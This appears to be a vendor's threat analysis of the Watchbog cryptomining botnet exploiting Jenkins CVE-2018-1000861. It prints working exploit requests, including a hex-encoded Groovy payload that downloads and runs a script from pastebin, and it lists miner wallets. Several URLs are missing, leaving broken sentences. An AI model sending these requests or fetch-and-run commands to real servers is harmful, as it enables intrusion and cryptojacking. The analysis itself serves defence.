Return of Watchbog: Exploiting Jenkins CVE-2018–1000861

On May 12th 2019, we observed Watchbog, a cryptocurrency-mining botnet, started a grand attack aiming at Jenkins. Infected servers do not automatically attack its peers, meaning that the trojan itself is not contagious. However, it still cause loss to victim users by mining cryptocurrency and adding malicious commands to scheduled task for persistence.

Watchbog botnet is not new; it has previous conviction. Earlier this year, we detected watchbog attacking services such as Nexus Repository Manager 3, ThinkPHP and Linux Supervisord and deploying miners with highly similar technique. The process is very straightforward, as shown below:

This article gives insight into the attack event and provides suggestion for cleaning malware and preventing future intrusion.

Start of Attack

We found this request on a victim Jenkins server, exploiting CVE-2018–1000861 :

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=True&value=public class x{public x(){new String("776765742068747470733a2f2f706173746562696e2e636f6d2f7261772f42335235556e7768202d4f202f746d702f62616279".decodeHex()).execute()}} HTTP/1.1
Host: [victim_host]:[jenkins_port]

This payload is different from another exploit targeting CVE-2019–1003000 we have seen in another botnet event by ImposterMiner in February:

GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(,%20root=%27http://,%20module=%27poc%27,%20version=%278%27)%0aimport%20Orange; HTTP/1.1
Host: [victim_host]:[jenkins_port]

The two payloads look alike because they both use the “/securityRealm/user/admin/descriptorByName” gadget. Yet they are essentially different in that CVE-2018–1000861 is a vulnerability in Jenkins’ Stapler web framework, while CVE-2019–1003000 is in Script Security Plugin.

The hex-encoded part in the former CVE-2018–1000861 payload downloads and runs malicious shell command:

wget -O /tmp/baby
bash /tmp/baby

The contained url points to another pastebin url (, which points to yet another.

The main part of malicious shell script is encoded and placed in

Mining and Persistence

During execution of the aforesaid shell script, a cryptocurrency miner is installed on victim server by downloading from following URL (decoded from $mi_64)

Configuration file for mining is as follows:

The malicious shell script maintain persistence by adding itself to crontab.

Other tampered crontab files:

An ironic thing is that the threat actor says victims can contact him at and promises to offer “cleanup script, source of entry and patch”.

According to, the threat actor may have earned about 20 Moneros (1500USD) as economic profit from mining.

Another thing worth mentioning is that we have reported malicious URLs to and request to ban those addresses when watchbog first started its attack in March. However has not replied or taken any effective action.

Security Suggestion

  • Services for internal use should not be exposed to the Internet. Use adequate ACL or other authentication techniques to only allow access from trusted users.
  • It is necessary for users to upgrade their software in time, especially when the vendor of software has published security-related advisory.
  • Since has been used by many botnets, users who do not often visit this website may use some tricks to drop packets to and from it, such as on Linux you can run: echo -e "\n0.0.0.0" >> /etc/hosts This command sinkholes(redirects) any traffic to and from
  • Cloud firewalls are useful in preventing attacks. We recommend Alibaba Cloud Firewall because it is able to detect, block and analyze threats. You will be protected from intrusion and malicious mining with AI technologies on your side.
  • Alibaba Cloud Managed Security Service enables users to call on expertise of Alibaba’s security specialists, who will help you clean up malware, improve configurations, and enhance overall security. If you are concerned about your organization’s security, you should give it a try.



44gaihcvA4DHwaWoKgVWyuKXNpuY2fAkKbByPCASosAw6XcrVtQ4VwdHMzoptXVHJwEErbds66L9iWN6dRPNZJCqDhqni3B (previous)
47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 (current)

pool address:




local path:




Follow me to keep abreast with the latest technology news, industry insights, and developer trends.